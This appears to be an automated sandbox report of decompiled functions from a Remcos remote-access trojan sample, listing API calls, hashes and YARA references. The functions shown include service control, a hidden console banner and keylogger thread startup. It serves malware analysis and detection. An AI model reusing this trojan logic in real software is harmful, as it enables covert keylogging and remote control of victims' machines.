                                  • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID:
                                  • API String ID: 3444260106-0
                                  • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                  • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004117C7, Relevance: 15.1, APIs: 10, Instructions: 61serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004117C7(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t12;
				int _t20;
				void* _t23;
				void* _t24;

				_t20 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x11);
				_t24 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
				if(_t23 != 0) {
					if(ControlService(_t23, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t23,  &_v32);
						} while (_v28 != 1);
						_t12 = StartServiceW(_t23, 0, 0);
						asm("sbb eax, eax");
						_t20 = ( ~_t12 & 0x000000fe) + 3;
					} else {
						_t20 = 2;
					}
					CloseServiceHandle(_t24);
					CloseServiceHandle(_t23);
				} else {
					CloseServiceHandle(_t24);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t20;
			}










                                  0x004117d0
                                  0x004117d6
                                  0x004117e4
                                  0x004117e6
                                  0x004117f4
                                  0x004117f8
                                  0x00411812
                                  0x00411818
                                  0x0041181d
                                  0x00411823
                                  0x0041182c
                                  0x00411834
                                  0x0041183b
                                  0x00411814
                                  0x00411814
                                  0x00411814
                                  0x00411844
                                  0x00411847
                                  0x004117fa
                                  0x004117fb
                                  0x004117fb
                                  0x0041184c
                                  0x00411858

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                  • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413D3D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00413D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", "a", __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.2 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                  0x00413d3d
                                  0x00413d49
                                  0x00413d4f
                                  0x00413d57
                                  0x00413d5f
                                  0x00413d63
                                  0x00413d63
                                  0x00413d7c
                                  0x00413d8f
                                  0x00413d95
                                  0x00413d97
                                  0x00413d99
                                  0x00413d9a
                                  0x00413da6
                                  0x00413da8
                                  0x00413db4
                                  0x00413dbe
                                  0x00413dca
                                  0x00413dd3
                                  0x00413dd5
                                  0x00413dd9
                                  0x00413ddd
                                  0x00413de1
                                  0x00413de6
                                  0x00413de9
                                  0x00413df6
                                  0x00413dff
                                  0x00413e01
                                  0x00413e05
                                  0x00413e09
                                  0x00413e0d
                                  0x00413e12
                                  0x00413e15
                                  0x00413e23
                                  0x00413e32

                                  APIs
                                  • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                  • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                  • freopen.MSVCRT ref: 00413D7C
                                  • printf.MSVCRT ref: 00413E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                  • API String ID: 3419900118-1124569734
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405BC0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 45%
                                  			E00405BC0(void* __ecx) {
				char _v5;
				char _v6;
				void* _t8;
				void* _t31;

				_push(__ecx);
				_t31 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					 *((char*)(__ecx + 0x3d)) = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
						E00405156(_t31);
						if( *_t31 == 0) {
							CreateThread(0, 0, E0040526A, _t31, 0, 0);
						}
						CreateThread(0, 0, E00405299, _t31, 0, 0);
					}
					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
					 *(_t31 + 0x28) = _t8;
				}
				return _t8;
			}







                                  0x00405bc3
                                  0x00405bc6
                                  0x00405bce
                                  0x00405be3
                                  0x00405be7
                                  0x00405bef
                                  0x00405bfe
                                  0x00405c12
                                  0x00405c18
                                  0x00405c29
                                  0x00405c2d
                                  0x00405c34
                                  0x00405c40
                                  0x00405c40
                                  0x00405c4c
                                  0x00405c4c
                                  0x00405c58
                                  0x00405c5a
                                  0x00405c5a
                                  0x00405c61

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052A8,?,00000000,00000000), ref: 00405C58
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,?,00000000,00000000), ref: 00405C40
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005299,?,00000000,00000000), ref: 00405C4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                  • String ID: Online Keylogger Started$[INFO]
                                  • API String ID: 3243250608-3343292223
                                  • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                  • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E254, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E0040E254(void* __eax, void* __eflags) {
				void* _t7;
				void* _t9;
				void* _t28;

				_t33 = __eflags;
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
				E004017DD(_t28 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}






                                  0x0040e254
                                  0x0040e25d
                                  0x0040e266
                                  0x0040e273
                                  0x0040e27a
                                  0x0040e286
                                  0x0040e28d
                                  0x0040e29e
                                  0x0040e2aa
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                  • String ID: name
                                  • API String ID: 4248281052-1579384326
                                  • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                  • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411AF5, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00411AF5(void* __ecx, WCHAR* _a4) {
				char _v5;
				char _v6;
				void* _t13;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                  0x00411b08
                                  0x00411b1c
                                  0x00411b22
                                  0x00411b41
                                  0x00411b48
                                  0x00411b58

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                  • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                  • Sleep.KERNEL32(00002710), ref: 00411B48
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                  • String ID: Alarm has been triggered!$[ALARM]
                                  • API String ID: 4004766653-1190268461
                                  • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                  • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8FF, Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040D8FF() {
				void* _t10;
				char* _t12;
				int _t13;
				char* _t15;
				signed int _t16;
				char* _t18;
				void* _t41;
				void* _t46;
				intOrPtr _t51;

				_t51 =  *0x41bf20; // 0x0
				 *0x41c119 = 0;
				if(_t51 != 0) {
					E004020F4(_t10, 0x41bf20);
				}
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t13 = atoi(_t12);
				E0040F572();
				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t16 = atoi(_t15);
				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
				E004017DD(_t46 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}












                                  0x0040d901
                                  0x0040d907
                                  0x0040d90d
                                  0x0040d914
                                  0x0040d914
                                  0x0040d928
                                  0x0040d933
                                  0x0040d93a
                                  0x0040d947
                                  0x0040d94c
                                  0x0040d957
                                  0x0040d95e
                                  0x0040d965
                                  0x0040d973
                                  0x0040d97a
                                  0x0040d985
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                  • atoi.MSVCRT ref: 0040D947
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                  • atoi.MSVCRT ref: 0040D965
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                  • atoi.MSVCRT ref: 0040D981
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  Memory Dump Source
